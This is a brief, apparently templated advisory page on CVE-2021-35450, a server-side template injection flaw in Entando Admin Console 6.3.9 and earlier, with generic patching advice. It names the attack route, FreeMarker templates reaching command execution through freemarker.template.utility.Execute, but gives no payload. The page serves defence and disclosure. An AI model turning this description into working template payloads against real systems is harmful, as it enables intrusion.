CVE-2021-35450 : What You Need to Know

A Server Side Template Injection vulnerability in the Entando Admin Console version 6.3.9 and earlier allows a privileged user to execute FreeMarker templates leading to command execution via freemarker.template.utility.Execute.

Understanding CVE-2021-35450

This vulnerability allows a user to abuse the FreeMarker template engine in the Entando Admin Console to execute arbitrary commands.

What is CVE-2021-35450?

CVE-2021-35450 is a Server Side Template Injection vulnerability in the Entando Admin Console that permits users with privileges to execute malicious commands via FreeMarker templates.

The Impact of CVE-2021-35450

An attacker exploiting this vulnerability can gain unauthorized access, manipulate data, and execute arbitrary commands on the affected system, posing a significant security risk.

Technical Details of CVE-2021-35450

The following technical details outline the vulnerability, affected systems, and exploitation mechanism:

Vulnerability Description

The vulnerability allows an attacker with privileges to execute FreeMarker templates, resulting in the execution of arbitrary commands via freemarker.template.utility.Execute.

Affected Systems and Versions

Entando Admin Console versions 6.3.9 and before are impacted by this vulnerability.

Exploitation Mechanism

By leveraging the Server Side Template Injection flaw, an attacker can craft malicious FreeMarker templates to execute arbitrary commands on the target system.

Mitigation and Prevention

To address CVE-2021-35450, follow these mitigation strategies:

Immediate Steps to Take

Update Entando Admin Console to the latest patched version to mitigate the vulnerability.

Long-Term Security Practices

Regularly monitor security advisories and update systems promptly to prevent exploitation of known vulnerabilities.

Patching and Updates

Apply security patches and updates from the official Entando sources to protect systems against potential threats.